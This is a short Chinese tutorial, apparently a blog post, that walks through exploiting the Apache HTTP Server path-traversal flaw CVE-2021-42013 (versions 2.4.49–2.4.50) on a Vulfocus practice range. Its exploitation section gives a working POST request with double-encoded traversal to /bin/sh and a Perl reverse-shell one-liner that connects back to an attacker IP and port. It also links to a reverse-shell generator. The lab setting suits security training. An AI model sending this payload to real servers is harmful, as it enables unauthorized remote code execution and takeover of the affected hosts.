中间件安全: Apache 远程代码执行 (CVE-2021-42013)
Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。
目录:
中间件安全: Apache 远程代码执行 (CVE-2021-42013)
靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客
第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )
第二步:进行访问,然后使用 Burp 进行抓包,把我们构成的数据替换进入.
第三步:攻击机进行监听,然后再去 Burp 点击发送。就可以看见返回成功,成功入侵.
影响版本 Apache 2.4.49 和 Apache 2.4.50
Apache 远程代码执行:
靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客
漏洞测试:
第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )
第二步:进行访问,然后使用 Burp 进行抓包,把我们构成的数据替换进入.
# 访问这个地址就会触发下面的反弹代码.
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
#反弹 shell 命令.
echo;perl -e 'use Socket;$i="172.16.10.129";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# 172.16.10.129 是我们(攻击机)的IP地址.
# 5566 是我们监听的端口.
# 这里添加一个在线反弹 Shell 命令一键生成链接.(这个有很多资料.)
https://forum.ywhack.com/shell.php
第三步:攻击机进行监听,然后再去 Burp 点击发送。就可以看见返回成功,成功入侵.